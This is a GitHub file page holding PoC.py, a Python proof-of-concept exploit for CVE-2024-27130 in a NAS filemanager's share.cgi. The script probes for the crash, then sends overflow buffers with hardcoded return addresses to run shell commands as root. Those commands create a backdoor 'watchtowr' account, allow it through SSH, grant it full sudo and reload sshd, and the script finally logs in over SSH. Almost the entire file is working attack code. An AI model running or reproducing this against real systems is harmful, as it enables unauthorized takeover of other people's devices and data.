-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPoC.py
118 lines (102 loc) · 3.87 KB
/
PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
import argparse
import os
import requests
import urllib3
from colorama import init, Fore, Style
# Initialize colorama
init()
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Define ASCII art with colors
ascii_art = f"""
{Fore.RED} . .
{Fore.GREEN} |\ |\\
{Fore.YELLOW} _..;|;__;|;
,' ';` \\';`-.
7;-.. : )
.--._)| `;==,|,=='
`\\`@; \\_ `<`G," G).
`\\/-;,( ) .>. )
< ,-;'-.__.;'
`\\_ `-,__,
{Style.RESET_ALL} `;;;;
"""
# Define colors for logging
colors = {
'INFO': Fore.GREEN,
'ERROR': Fore.RED,
'WARNING': Fore.YELLOW
}
# Function to log messages with colors
def log(message, level='INFO'):
color = colors.get(level, Fore.WHITE)
print(f"{color}[{level}] {message}{Style.RESET_ALL}")
def check_vulnerability(host):
url = f"https://{host}/cgi-bin/filemanager/share.cgi"
payload = {
'func': 'get_file_size',
'total': '1',
'path': '/',
'name': 'A' * 10000
}
try:
response = requests.post(url, data=payload, verify=False, timeout=5)
if response.status_code == 200:
if "SIGSEGV" in response.text:
print(f"The target {host} is vulnerable to CVE-2024-27130")
else:
print(f"The target {host} is not vulnerable to CVE-2024-27130")
else:
print(f"Failed to check vulnerability for {host}. Status code: {response.status_code}")
raise SystemExit() # Halt execution if there's an error
except Exception as e:
print(f"An error occurred while checking vulnerability for {host}: {str(e)}")
raise SystemExit() # Halt execution if there's an error
def main(args):
docmd(args, f"/../../../../usr/local/bin/useradd -p \"$(openssl passwd -6 {args.password})\" watchtowr #".encode('ascii'))
docmd(args, b"/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config # ")
docmd(args, b"/../../../../bin/echo watchtowr ALL=\\\\(ALL\\\\) ALL >> /usr/etc/sudoers # ")
docmd(args, b"/../../../../usr/bin/killall -SIGHUP sshd # ")
def docmd(args, cmd):
log(f"Executing command: '{cmd}'", level='INFO')
buf = cmd
buf = buf + b'A' * (4082 - len(buf))
buf = buf + (0x54140508).to_bytes(4, 'little') # delimiter
buf = buf + (0x54140508).to_bytes(4, 'little') # r0 and r3
buf = buf + (0x54140508).to_bytes(4, 'little') #
buf = buf + (0x54140508).to_bytes(4, 'little') # r7
buf = buf + (0x73af5148).to_bytes(4, 'little') # pc
payload = {
'ssid': args.ssid,
'func': 'get_file_size',
'total': '1',
'path': '/',
'name': buf
}
try:
requests.post(
f"https://{args.host}/cgi-bin/filemanager/share.cgi",
verify=False,
data=payload,
timeout=2
)
except Exception as e:
log(f"Error executing command: {e}", level='ERROR')
raise SystemExit() # Halt execution if there's an error
def make_random_string():
chars = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
return "".join(chars[c % len(chars)] for c in os.urandom(8))
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='PoC', description='PoC for CVE-2024-27130', usage="Obtain an 'ssid' by requesting a NAS user to share a file to you.")
parser.add_argument('host')
parser.add_argument('ssid')
args = parser.parse_args()
args.password = make_random_string()
# Print ASCII art
print(ascii_art)
try:
check_vulnerability(args.host)
main(args)
print(f"{Fore.YELLOW}Created new user successfully. Log in with password '{args.password}' when prompted.{Style.RESET_ALL}")
os.system(f'ssh watchtowr@{args.host}')
except Exception as e:
log(f"An error occurred: {e}", level='ERROR')